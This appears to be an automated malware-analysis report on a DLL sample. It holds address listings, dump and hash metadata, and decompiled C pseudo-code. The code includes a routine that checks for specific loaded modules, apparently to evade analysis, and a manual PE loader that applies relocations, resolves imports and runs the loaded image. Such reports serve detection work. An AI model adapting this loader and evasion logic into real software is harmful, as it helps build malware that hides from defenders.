                                                                                                                                                                                                0x10013063
                                                                                                                                                                                                0x10013063
                                                                                                                                                                                                0x10013063
                                                                                                                                                                                                0x10013066
                                                                                                                                                                                                0x10013069
                                                                                                                                                                                                0x10013069
                                                                                                                                                                                                0x1001306c
                                                                                                                                                                                                0x1001306c
                                                                                                                                                                                                0x1001302f
                                                                                                                                                                                                0x1001306f
                                                                                                                                                                                                0x10013072
                                                                                                                                                                                                0x10013075
                                                                                                                                                                                                0x10013077
                                                                                                                                                                                                0x1001307a
                                                                                                                                                                                                0x1001307c
                                                                                                                                                                                                0x1001307f
                                                                                                                                                                                                0x10013082
                                                                                                                                                                                                0x10013084
                                                                                                                                                                                                0x10013087
                                                                                                                                                                                                0x1001308f
                                                                                                                                                                                                0x10013097
                                                                                                                                                                                                0x1001309a
                                                                                                                                                                                                0x1001309a
                                                                                                                                                                                                0x1001309a

                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3510742995-0
                                                                                                                                                                                                • Opcode ID: 02feba5ad5f49e0a995842d61c8ce91333d91de9632e587c2a68fb90f2e6a76c
                                                                                                                                                                                                • Instruction ID: b8b21e117a170e539179d3266b9c205756a6e1e5336b1e784b578d53a4793964
                                                                                                                                                                                                • Opcode Fuzzy Hash: 02feba5ad5f49e0a995842d61c8ce91333d91de9632e587c2a68fb90f2e6a76c
                                                                                                                                                                                                • Instruction Fuzzy Hash: 49D123B5600A009FCB28CF69C8D4A5AB7F1FF88344B25892DE88ACB711D731F995CB50
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 70%
                                                                                                                                                                                                			E10004D60(intOrPtr* __ecx, void* __edx, void* __fp0) {
                                                                                                                                                                                                				char _v516;
                                                                                                                                                                                                				char _v556;
                                                                                                                                                                                                				char _v564;
                                                                                                                                                                                                				char _v568;
                                                                                                                                                                                                				char _v572;
                                                                                                                                                                                                				char _v576;
                                                                                                                                                                                                				intOrPtr _v580;
                                                                                                                                                                                                				char _v588;
                                                                                                                                                                                                				signed int _v596;
                                                                                                                                                                                                				intOrPtr _v602;
                                                                                                                                                                                                				intOrPtr _v604;
                                                                                                                                                                                                				char _v608;
                                                                                                                                                                                                				CHAR* _v612;
                                                                                                                                                                                                				CHAR* _v616;
                                                                                                                                                                                                				signed int _v620;
                                                                                                                                                                                                				signed int _v624;
                                                                                                                                                                                                				signed int _v628;
                                                                                                                                                                                                				signed int _v632;
                                                                                                                                                                                                				char _v636;
                                                                                                                                                                                                				intOrPtr _t119;
                                                                                                                                                                                                				signed int _t122;
                                                                                                                                                                                                				CHAR* _t124;
                                                                                                                                                                                                				intOrPtr _t125;
                                                                                                                                                                                                				CHAR* _t127;
                                                                                                                                                                                                				WCHAR* _t130;
                                                                                                                                                                                                				intOrPtr _t133;
                                                                                                                                                                                                				intOrPtr _t137;
                                                                                                                                                                                                				WCHAR* _t138;
                                                                                                                                                                                                				intOrPtr _t142;
                                                                                                                                                                                                				WCHAR* _t143;
                                                                                                                                                                                                				CHAR* _t144;
                                                                                                                                                                                                				intOrPtr _t145;
                                                                                                                                                                                                				intOrPtr _t150;
				intOrPtr _t153;
				WCHAR* _t154;
				signed int _t159;
				WCHAR* _t160;
				intOrPtr _t163;
				intOrPtr _t165;
				intOrPtr _t166;
				intOrPtr _t170;
				signed int _t173;
				signed int _t178;
				intOrPtr _t182;
				WCHAR* _t184;
				char _t186;
				WCHAR* _t188;
				intOrPtr _t200;
				intOrPtr _t211;
				signed int _t215;
				char _t220;
				WCHAR* _t231;
				intOrPtr _t235;
				intOrPtr _t238;
				intOrPtr _t239;
				intOrPtr _t246;
				signed int _t248;
				WCHAR* _t249;
				CHAR* _t250;
				intOrPtr _t262;
				void* _t271;
				intOrPtr _t272;
				signed int _t277;
				void* _t278;
				intOrPtr _t280;
				signed int _t282;
				void* _t298;
				void* _t299;
				intOrPtr _t305;
				CHAR* _t326;
				void* _t328;
				WCHAR* _t329;
				intOrPtr _t331;
				WCHAR* _t333;
				signed int _t335;
				intOrPtr* _t337;
				void* _t338;
				void* _t339;
				void* _t353;

				_t353 = __fp0;
				_t337 = (_t335 & 0xfffffff8) - 0x26c;
				_t119 =  *0x1001e688; // 0x4cb04a0
				_v620 = _v620 & 0x00000000;
				_t328 = __ecx;
				if(( *(_t119 + 0x1898) & 0x00000082) == 0) {
					L7:
					_t14 = E1000B7EA(0x1001b9c4,  &_v516) + 1; // 0x1
					E1000A8AF( &_v556, _t14, _t351);
					_t298 = 0x64;
					_t122 = E1000A4B3( &_v556, _t298);
					 *0x1001e748 = _t122;
					if(_t122 != 0) {
						_push(0x4e5);
						_t299 = 0x10;
						 *0x1001e680 = E1000E1FE(0x1001b9c8, _t299);
						 *_t337 = 0x610;
						_t124 = E100095C2(0x1001b9c8);
						_push(0);
						_push(_t124);
						_v612 = _t124;
						_t125 =  *0x1001e688; // 0x4cb04a0
						_t127 = E100092C6(_t125 + 0x228);
						_t338 = _t337 + 0xc;
						_v616 = _t127;
						E100085B6( &_v612);
						_t130 = E1000B2AB(_t127);
						_t246 = 3;
						__eflags = _t130;
						if(_t130 != 0) {
							 *((intOrPtr*)(_t328 + 0x10)) = _t239;
							 *_t328 = _t246;
						}
						E100085FB( &_v616, 0xfffffffe);
						_t133 =  *0x1001e688; // 0x4cb04a0
						_t21 = _t133 + 0x110; // 0x4d2fb70
						_t22 = _t133 + 0x114; // 0x4cb05b4
						E100049FE( *((intOrPtr*)( *_t21)), _t22, _t353, _t328, 0, 0);
						_t262 =  *0x1001e688; // 0x4cb04a0
						_t339 = _t338 + 0x14;
						__eflags =  *((intOrPtr*)(_t262 + 0x101c)) - _t246;
						if( *((intOrPtr*)(_t262 + 0x101c)) == _t246) {
							L17:
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							_v572 = _t328;
							_t28 = _t262 + 0x214; // 0x2
							_v576 =  *_t28;
							_t137 =  *0x1001e680; // 0x0
							_t138 =  *(_t137 + 8);
							__eflags = _t138;
							if(_t138 != 0) {
								 *_t138(0, 0, 1,  &_v568,  &_v564);
							}
							_v620 = _v620 & 0x00000000;
							E1000E308(_t353,  &_v576);
							_pop(_t262);
							_t142 =  *0x1001e6b4; // 0x4d2fa20
							_t143 =  *((intOrPtr*)(_t142 + 0x10))(0, 0,  &_v620);
							__eflags = _t143;
							if(_t143 == 0) {
								E1000E308(_t353,  &_v588);
								_t235 =  *0x1001e6b4; // 0x4d2fa20
								_pop(_t262);
								 *((intOrPtr*)(_t235 + 0xc))(_v632);
							}
							__eflags =  *0x1001e73c;
							if( *0x1001e73c <= 0) {
								goto L36;
							} else {
								_t165 =  *0x1001e680; // 0x0
								__eflags =  *(_t165 + 8);
								if( *(_t165 + 8) != 0) {
									_t231 =  *(_t165 + 0xc);
									__eflags = _t231;
									if(_t231 != 0) {
										 *_t231(_v580);
									}
								}
								_t166 =  *0x1001e688; // 0x4cb04a0
								_t45 = _t166 + 0x214; // 0x2
								_t262 =  *_t45;
								__eflags = _t262 - _t246;
								if(_t262 == _t246) {
									goto L36;
								} else {
									__eflags =  *((intOrPtr*)(_t166 + 4)) - 6;
									if( *((intOrPtr*)(_t166 + 4)) >= 6) {
										__eflags =  *((intOrPtr*)(_t166 + 0x101c)) - _t246;
										if( *((intOrPtr*)(_t166 + 0x101c)) == _t246) {
											E10004998();
											asm("stosd");
											asm("stosd");
											asm("stosd");
											asm("stosd");
											_t170 =  *0x1001e684; // 0x4d2f878
											 *((intOrPtr*)(_t170 + 0xd8))( &_v608);
											_t262 = _v602;
											_t248 = 0x3c;
											_t173 = _t262 + 0x00000002 & 0x0000ffff;
											_v596 = _t173;
											_v620 = _t173 / _t248 + _v604 & 0x0000ffff;
											_t178 = _t262 + 0x0000000e & 0x0000ffff;
											_v624 = _t178;
											_v628 = _t178 / _t248 + _v604 & 0x0000ffff;
											_t182 =  *0x1001e688; // 0x4cb04a0
											_t184 = E1000FC57(_t182 + 0x228, _t178 % _t248, _t353, 0, _t182 + 0x228, 0);
											_t339 = _t339 + 0xc;
											__eflags = _t184;
											if(_t184 >= 0) {
												_t333 = E100085E5(0x1000);
												_v616 = _t333;
												_pop(_t262);
												__eflags = _t333;
												if(_t333 != 0) {
                                                                                                                                                                                                													_t186 = E1000109A(_t262, 0x148);
                                                                                                                                                                                                													_t305 =  *0x1001e688; // 0x4cb04a0
                                                                                                                                                                                                													_v636 = _t186;
                                                                                                                                                                                                													_push(_t305 + 0x648);
                                                                                                                                                                                                													_push(0xa);
                                                                                                                                                                                                													_push(7);
                                                                                                                                                                                                													_t271 = 2;
                                                                                                                                                                                                													E1000900E(_t271,  &_v572);
                                                                                                                                                                                                													_t272 =  *0x1001e688; // 0x4cb04a0
                                                                                                                                                                                                													_t92 = _t272 + 0xa0; // 0x1
                                                                                                                                                                                                													_t188 = E100060C0( &_v572, _t272 + 0x228, 1,  *_t92);
                                                                                                                                                                                                													_t339 = _t339 + 0x18;
                                                                                                                                                                                                													_v632 = _t188;
                                                                                                                                                                                                													__eflags = _t188;
                                                                                                                                                                                                													if(_t188 != 0) {
                                                                                                                                                                                                														_push(_v624 % _t248 & 0x0000ffff);
                                                                                                                                                                                                														_push(_v628 & 0x0000ffff);
                                                                                                                                                                                                														_push(_v596 % _t248 & 0x0000ffff);
                                                                                                                                                                                                														_push(_v620 & 0x0000ffff);
                                                                                                                                                                                                														_push(_v632);
                                                                                                                                                                                                														_push( &_v572);
                                                                                                                                                                                                														_t200 =  *0x1001e688; // 0x4cb04a0
                                                                                                                                                                                                														__eflags = _t200 + 0x1020;
                                                                                                                                                                                                														E10009621(_t333, 0x1000, _v636, _t200 + 0x1020);
                                                                                                                                                                                                														E100085B6( &_v636);
                                                                                                                                                                                                														E1000A953(_t333, 0, 0xbb8, 1);
                                                                                                                                                                                                														E100085FB( &_v632, 0xfffffffe);
                                                                                                                                                                                                														_t339 = _t339 + 0x44;
                                                                                                                                                                                                													}
                                                                                                                                                                                                													E100085FB( &_v616, 0xfffffffe);
                                                                                                                                                                                                													_pop(_t262);
                                                                                                                                                                                                												}
                                                                                                                                                                                                											}
                                                                                                                                                                                                										}
                                                                                                                                                                                                										goto L36;
                                                                                                                                                                                                									}
                                                                                                                                                                                                									__eflags = _t262 - 2;
                                                                                                                                                                                                									if(_t262 != 2) {
                                                                                                                                                                                                										goto L36;
                                                                                                                                                                                                									}
                                                                                                                                                                                                									E10004998();
                                                                                                                                                                                                									asm("stosd");
                                                                                                                                                                                                									asm("stosd");
                                                                                                                                                                                                									asm("stosd");
                                                                                                                                                                                                									asm("stosd");
                                                                                                                                                                                                									_t211 =  *0x1001e684; // 0x4d2f878
                                                                                                                                                                                                									 *((intOrPtr*)(_t211 + 0xd8))( &_v608);
                                                                                                                                                                                                									_t215 = _v602 + 0x00000002 & 0x0000ffff;
                                                                                                                                                                                                									_v628 = _t215;
                                                                                                                                                                                                									_t277 = 0x3c;
                                                                                                                                                                                                									_v632 = _t215 / _t277 + _v604 & 0x0000ffff;
                                                                                                                                                                                                									_t249 = E100085E5(0x1000);
                                                                                                                                                                                                									_v624 = _t249;
                                                                                                                                                                                                									_pop(_t278);
                                                                                                                                                                                                									__eflags = _t249;
                                                                                                                                                                                                									if(_t249 != 0) {
                                                                                                                                                                                                										_t220 = E100095C2(_t278, 0x32d);
                                                                                                                                                                                                										_t280 =  *0x1001e688; // 0x4cb04a0
                                                                                                                                                                                                										_push(_t280 + 0x228);
                                                                                                                                                                                                										_t282 = 0x3c;
                                                                                                                                                                                                										_v636 = _t220;
                                                                                                                                                                                                										_push(_v628 % _t282 & 0x0000ffff);
                                                                                                                                                                                                										E10009621(_t249, 0x1000, _t220, _v632 & 0x0000ffff);
                                                                                                                                                                                                										E100085B6( &_v636);
                                                                                                                                                                                                										E1000A953(_t249, 0, 0xbb8, 1);
                                                                                                                                                                                                										E100085FB( &_v624, 0xfffffffe);
                                                                                                                                                                                                									}
                                                                                                                                                                                                									goto L41;
                                                                                                                                                                                                								}
                                                                                                                                                                                                							}
                                                                                                                                                                                                						} else {
                                                                                                                                                                                                							_t24 = _t262 + 0x214; // 0x2
                                                                                                                                                                                                							_t238 =  *_t24;
                                                                                                                                                                                                							__eflags = _t238 - _t246;
                                                                                                                                                                                                							if(_t238 == _t246) {
                                                                                                                                                                                                								goto L17;
                                                                                                                                                                                                							}
                                                                                                                                                                                                							__eflags =  *((intOrPtr*)(_t262 + 4)) - 6;
                                                                                                                                                                                                							if( *((intOrPtr*)(_t262 + 4)) >= 6) {
                                                                                                                                                                                                								L36:
                                                                                                                                                                                                								_t144 = E100095C2(_t262, 0x610);
                                                                                                                                                                                                								_push(0);
                                                                                                                                                                                                								_push(_t144);
                                                                                                                                                                                                								_v616 = _t144;
                                                                                                                                                                                                								_t145 =  *0x1001e688; // 0x4cb04a0
                                                                                                                                                                                                								_t329 = E100092C6(_t145 + 0x228);
                                                                                                                                                                                                								_v612 = _t329;
                                                                                                                                                                                                								__eflags = _t329;
                                                                                                                                                                                                								if(_t329 != 0) {
                                                                                                                                                                                                									_t160 = E1000B2AB(_t329);
                                                                                                                                                                                                									__eflags = _t160;
                                                                                                                                                                                                									if(_t160 != 0) {
                                                                                                                                                                                                										_t163 =  *0x1001e684; // 0x4d2f878
                                                                                                                                                                                                										 *((intOrPtr*)(_t163 + 0x10c))(_t329);
                                                                                                                                                                                                									}
                                                                                                                                                                                                									E100085FB( &_v612, 0xfffffffe);
                                                                                                                                                                                                								}
                                                                                                                                                                                                								E100085B6( &_v616);
                                                                                                                                                                                                								_t150 =  *0x1001e688; // 0x4cb04a0
                                                                                                                                                                                                								lstrcpynW(_t150 + 0x438,  *0x1001e740, 0x105);
                                                                                                                                                                                                								_t153 =  *0x1001e688; // 0x4cb04a0
                                                                                                                                                                                                								_t154 = _t153 + 0x228;
                                                                                                                                                                                                								__eflags = _t154;
                                                                                                                                                                                                								lstrcpynW(_t154,  *0x1001e738, 0x105);
                                                                                                                                                                                                								_t331 =  *0x1001e688; // 0x4cb04a0
                                                                                                                                                                                                								_t117 = _t331 + 0x228; // 0x4cb06c8
                                                                                                                                                                                                								 *((intOrPtr*)(_t331 + 0x434)) = E10008F9F(_t117, __eflags);
                                                                                                                                                                                                								E100085FB(0x1001e740, 0xfffffffe);
                                                                                                                                                                                                								E100085FB(0x1001e738, 0xfffffffe);
                                                                                                                                                                                                								L41:
                                                                                                                                                                                                								_t159 = 0;
                                                                                                                                                                                                								__eflags = 0;
                                                                                                                                                                                                								L42:
                                                                                                                                                                                                								return _t159;
                                                                                                                                                                                                							}
                                                                                                                                                                                                							__eflags = _t238 - 2;
                                                                                                                                                                                                							if(_t238 != 2) {
                                                                                                                                                                                                								goto L36;
                                                                                                                                                                                                							}
                                                                                                                                                                                                							goto L17;
                                                                                                                                                                                                						}
                                                                                                                                                                                                					}
                                                                                                                                                                                                					L8:
                                                                                                                                                                                                					_t159 = _t122 | 0xffffffff;
                                                                                                                                                                                                					goto L42;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t250 = E100095A8(0x6e2);
                                                                                                                                                                                                				_v616 = _t250;
                                                                                                                                                                                                				_t326 = E100095A8(0x9f5);
                                                                                                                                                                                                				_v612 = _t326;
                                                                                                                                                                                                				if(_t250 != 0 && _t326 != 0) {
                                                                                                                                                                                                					if(GetModuleHandleA(_t250) != 0 || GetModuleHandleA(_t326) != 0) {
                                                                                                                                                                                                						_v620 = 1;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					E100085A3( &_v616);
                                                                                                                                                                                                					_t122 = E100085A3( &_v612);
                                                                                                                                                                                                					_t351 = _v620;
                                                                                                                                                                                                					if(_v620 != 0) {
                                                                                                                                                                                                						goto L8;
                                                                                                                                                                                                					}
                                                                                                                                                                                                				}
                                                                                                                                                                                                			}

                                                                                                                                                                                                0x10004fbc
                                                                                                                                                                                                0x10004fbd
                                                                                                                                                                                                0x10004fc3
                                                                                                                                                                                                0x10004fc8
                                                                                                                                                                                                0x10004fdc
                                                                                                                                                                                                0x10004fe1
                                                                                                                                                                                                0x10004fe5
                                                                                                                                                                                                0x10004ff0
                                                                                                                                                                                                0x10004ff9
                                                                                                                                                                                                0x10004ffb
                                                                                                                                                                                                0x10004fff
                                                                                                                                                                                                0x10005000
                                                                                                                                                                                                0x10005002
                                                                                                                                                                                                0x1000500d
                                                                                                                                                                                                0x10005013
                                                                                                                                                                                                0x10005025
                                                                                                                                                                                                0x10005028
                                                                                                                                                                                                0x1000502b
                                                                                                                                                                                                0x10005038
                                                                                                                                                                                                0x10005040
                                                                                                                                                                                                0x1000504a
                                                                                                                                                                                                0x1000505c
                                                                                                                                                                                                0x10005068
                                                                                                                                                                                                0x1000506d
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10005002
                                                                                                                                                                                                0x10004f96
                                                                                                                                                                                                0x10004ece
                                                                                                                                                                                                0x10004ece
                                                                                                                                                                                                0x10004ece
                                                                                                                                                                                                0x10004ed4
                                                                                                                                                                                                0x10004ed6
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10004ed8
                                                                                                                                                                                                0x10004edc
                                                                                                                                                                                                0x100051e6
                                                                                                                                                                                                0x100051eb
                                                                                                                                                                                                0x100051f1
                                                                                                                                                                                                0x100051f3
                                                                                                                                                                                                0x100051f4
                                                                                                                                                                                                0x100051f8
                                                                                                                                                                                                0x10005208
                                                                                                                                                                                                0x1000520d
                                                                                                                                                                                                0x10005211
                                                                                                                                                                                                0x10005213
                                                                                                                                                                                                0x10005217
                                                                                                                                                                                                0x1000521c
                                                                                                                                                                                                0x1000521e
                                                                                                                                                                                                0x10005220
                                                                                                                                                                                                0x10005226
                                                                                                                                                                                                0x10005226
                                                                                                                                                                                                0x10005233
                                                                                                                                                                                                0x10005239
                                                                                                                                                                                                0x1000523f
                                                                                                                                                                                                0x10005244
                                                                                                                                                                                                0x10005262
                                                                                                                                                                                                0x10005264
                                                                                                                                                                                                0x10005270
                                                                                                                                                                                                0x10005270
                                                                                                                                                                                                0x10005276
                                                                                                                                                                                                0x10005278
                                                                                                                                                                                                0x1000527e
                                                                                                                                                                                                0x10005290
                                                                                                                                                                                                0x10005296
                                                                                                                                                                                                0x100052a2
                                                                                                                                                                                                0x100052aa
                                                                                                                                                                                                0x100052aa
                                                                                                                                                                                                0x100052aa
                                                                                                                                                                                                0x100052ac
                                                                                                                                                                                                0x100052b2
                                                                                                                                                                                                0x100052b2
                                                                                                                                                                                                0x10004ee2
                                                                                                                                                                                                0x10004ee5
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10004ee5
                                                                                                                                                                                                0x10004ecc
                                                                                                                                                                                                0x10004e10
                                                                                                                                                                                                0x10004e10
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10004e10
                                                                                                                                                                                                0x10004d8e
                                                                                                                                                                                                0x10004d95
                                                                                                                                                                                                0x10004d9e
                                                                                                                                                                                                0x10004da0
                                                                                                                                                                                                0x10004da6
                                                                                                                                                                                                0x10004db7
                                                                                                                                                                                                0x10004dc0
                                                                                                                                                                                                0x10004dc0
                                                                                                                                                                                                0x10004dcc
                                                                                                                                                                                                0x10004dd5
                                                                                                                                                                                                0x10004dda
                                                                                                                                                                                                0x10004ddf
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10004ddf

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 10004DB3
                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000), ref: 10004DBA
                                                                                                                                                                                                • lstrcpynW.KERNEL32(04CB0068,00000105), ref: 10005262
                                                                                                                                                                                                • lstrcpynW.KERNEL32(04CB0278,00000105), ref: 10005276
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: HandleModulelstrcpyn
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3430401031-0
                                                                                                                                                                                                • Opcode ID: e65ca0fb4148daa740698ab9e9525690199d64fdaa5cc465d66fe570dea2e5a3
                                                                                                                                                                                                • Instruction ID: 75edd9153102fbeb7f3d0af659dc9bba35956ed8099fcea896ccea7dd972ea61
                                                                                                                                                                                                • Opcode Fuzzy Hash: e65ca0fb4148daa740698ab9e9525690199d64fdaa5cc465d66fe570dea2e5a3
                                                                                                                                                                                                • Instruction Fuzzy Hash: 23E1CC71608341AFF300DF64CC86FAA73E9EB98390F414929F584DB2D5DB75EA448B52
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 52%
                                                                                                                                                                                                			E10012B24(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                                                                                                				signed int _v5;
                                                                                                                                                                                                				signed short _v12;
                                                                                                                                                                                                				intOrPtr* _v16;
                                                                                                                                                                                                				signed int* _v20;
                                                                                                                                                                                                				intOrPtr _v24;
                                                                                                                                                                                                				unsigned int _v28;
                                                                                                                                                                                                				signed short* _v32;
                                                                                                                                                                                                				struct HINSTANCE__* _v36;
                                                                                                                                                                                                				intOrPtr* _v40;
                                                                                                                                                                                                				signed short* _v44;
                                                                                                                                                                                                				intOrPtr _v48;
                                                                                                                                                                                                				unsigned int _v52;
                                                                                                                                                                                                				intOrPtr _v56;
                                                                                                                                                                                                				_Unknown_base(*)()* _v60;
                                                                                                                                                                                                				signed int _v64;
                                                                                                                                                                                                				intOrPtr _v68;
                                                                                                                                                                                                				intOrPtr _v72;
                                                                                                                                                                                                				unsigned int _v76;
                                                                                                                                                                                                				intOrPtr _v80;
                                                                                                                                                                                                				signed int _v84;
                                                                                                                                                                                                				intOrPtr _v88;
                                                                                                                                                                                                				signed int _t149;
                                                                                                                                                                                                				void* _t189;
                                                                                                                                                                                                				signed int _t194;
                                                                                                                                                                                                				signed int _t196;
                                                                                                                                                                                                				intOrPtr _t236;
                                                                                                                                                                                                
                                                                                                                                                                                                				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                                                                                                                                                                                                				_v24 = _v72;
                                                                                                                                                                                                				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
                                                                                                                                                                                                				_v56 = _t236;
                                                                                                                                                                                                				if(_t236 == 0) {
                                                                                                                                                                                                					L13:
                                                                                                                                                                                                					while(0 != 0) {
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_push(8);
                                                                                                                                                                                                					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
                                                                                                                                                                                                						L35:
                                                                                                                                                                                                						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
                                                                                                                                                                                                						while(0 != 0) {
                                                                                                                                                                                                						}
                                                                                                                                                                                                						if(_a12 != 0) {
                                                                                                                                                                                                							 *_a12 = _v68;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
                                                                                                                                                                                                						return _v68(_a4, 1, _a8);
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_v84 = 0x80000000;
                                                                                                                                                                                                					_t149 = 8;
                                                                                                                                                                                                					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
                                                                                                                                                                                                					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
                                                                                                                                                                                                						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                                                                                                                                                                                                						if(_v36 == 0) {
                                                                                                                                                                                                							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                                                                                                                                                                                                						}
                                                                                                                                                                                                						if(_v36 != 0) {
                                                                                                                                                                                                							if( *_v16 == 0) {
                                                                                                                                                                                                								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
                                                                                                                                                                                                							} else {
                                                                                                                                                                                                								_v20 =  *_v16 + _a4;
                                                                                                                                                                                                							}
                                                                                                                                                                                                							_v64 = _v64 & 0x00000000;
                                                                                                                                                                                                							while( *_v20 != 0) {
                                                                                                                                                                                                								if(( *_v20 & _v84) == 0) {
                                                                                                                                                                                                									_v88 =  *_v20 + _a4;
                                                                                                                                                                                                									_v60 = GetProcAddress(_v36, _v88 + 2);
                                                                                                                                                                                                								} else {
                                                                                                                                                                                                									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
                                                                                                                                                                                                								}
                                                                                                                                                                                                								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
                                                                                                                                                                                                									 *_v20 = _v60;
                                                                                                                                                                                                								} else {
                                                                                                                                                                                                									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
                                                                                                                                                                                                								}
                                                                                                                                                                                                								_v20 =  &(_v20[1]);
                                                                                                                                                                                                								_v64 = _v64 + 4;
                                                                                                                                                                                                							}
                                                                                                                                                                                                							_v16 = _v16 + 0x14;
                                                                                                                                                                                                							continue;
                                                                                                                                                                                                						} else {
                                                                                                                                                                                                							_t189 = 0xfffffffd;
                                                                                                                                                                                                							return _t189;
                                                                                                                                                                                                						}
                                                                                                                                                                                                					}
                                                                                                                                                                                                					goto L35;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t194 = 8;
                                                                                                                                                                                                				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
                                                                                                                                                                                                				_t196 = 8;
                                                                                                                                                                                                				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
                                                                                                                                                                                                				while(0 != 0) {
                                                                                                                                                                                                				}
                                                                                                                                                                                                				while(_v48 > 0) {
                                                                                                                                                                                                					_v28 = _v44[2];
                                                                                                                                                                                                					_v48 = _v48 - _v28;
                                                                                                                                                                                                					_v28 = _v28 - 8;
                                                                                                                                                                                                					_v28 = _v28 >> 1;
                                                                                                                                                                                                					_v32 =  &(_v44[4]);
                                                                                                                                                                                                					_v80 = _a4 +  *_v44;
                                                                                                                                                                                                					_v52 = _v28;
                                                                                                                                                                                                					while(1) {
                                                                                                                                                                                                						_v76 = _v52;
                                                                                                                                                                                                						_v52 = _v52 - 1;
                                                                                                                                                                                                						if(_v76 == 0) {
                                                                                                                                                                                                							break;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
                                                                                                                                                                                                						_v12 =  *_v32 & 0xfff;
                                                                                                                                                                                                						_v40 = (_v12 & 0x0000ffff) + _v80;
                                                                                                                                                                                                						if((_v5 & 0x000000ff) != 3) {
                                                                                                                                                                                                							if((_v5 & 0x000000ff) == 0xa) {
                                                                                                                                                                                                								 *_v40 =  *_v40 + _v56;
                                                                                                                                                                                                							}
                                                                                                                                                                                                						} else {
                                                                                                                                                                                                							 *_v40 =  *_v40 + _v56;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						_v32 =  &(_v32[1]);
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_v44 = _v32;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				goto L13;
                                                                                                                                                                                                			}
                                                                                                                                                                                                0x10012b5e
                                                                                                                                                                                                0x10012b63
                                                                                                                                                                                                0x10012b6e
                                                                                                                                                                                                0x10012b71
                                                                                                                                                                                                0x10012b75
                                                                                                                                                                                                0x10012b77
                                                                                                                                                                                                0x10012b87
                                                                                                                                                                                                0x10012b90
                                                                                                                                                                                                0x10012b99
                                                                                                                                                                                                0x10012ba1
                                                                                                                                                                                                0x10012baa
                                                                                                                                                                                                0x10012bb5
                                                                                                                                                                                                0x10012bbb
                                                                                                                                                                                                0x10012bbe
                                                                                                                                                                                                0x10012bc1
                                                                                                                                                                                                0x10012bc8
                                                                                                                                                                                                0x10012bcf
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10012bda
                                                                                                                                                                                                0x10012be8
                                                                                                                                                                                                0x10012bf3
                                                                                                                                                                                                0x10012bfd
                                                                                                                                                                                                0x10012c15
                                                                                                                                                                                                0x10012c22
                                                                                                                                                                                                0x10012c22
                                                                                                                                                                                                0x10012bff
                                                                                                                                                                                                0x10012c0a
                                                                                                                                                                                                0x10012c0a
                                                                                                                                                                                                0x10012c29
                                                                                                                                                                                                0x10012c29
                                                                                                                                                                                                0x10012c31
                                                                                                                                                                                                0x10012c31
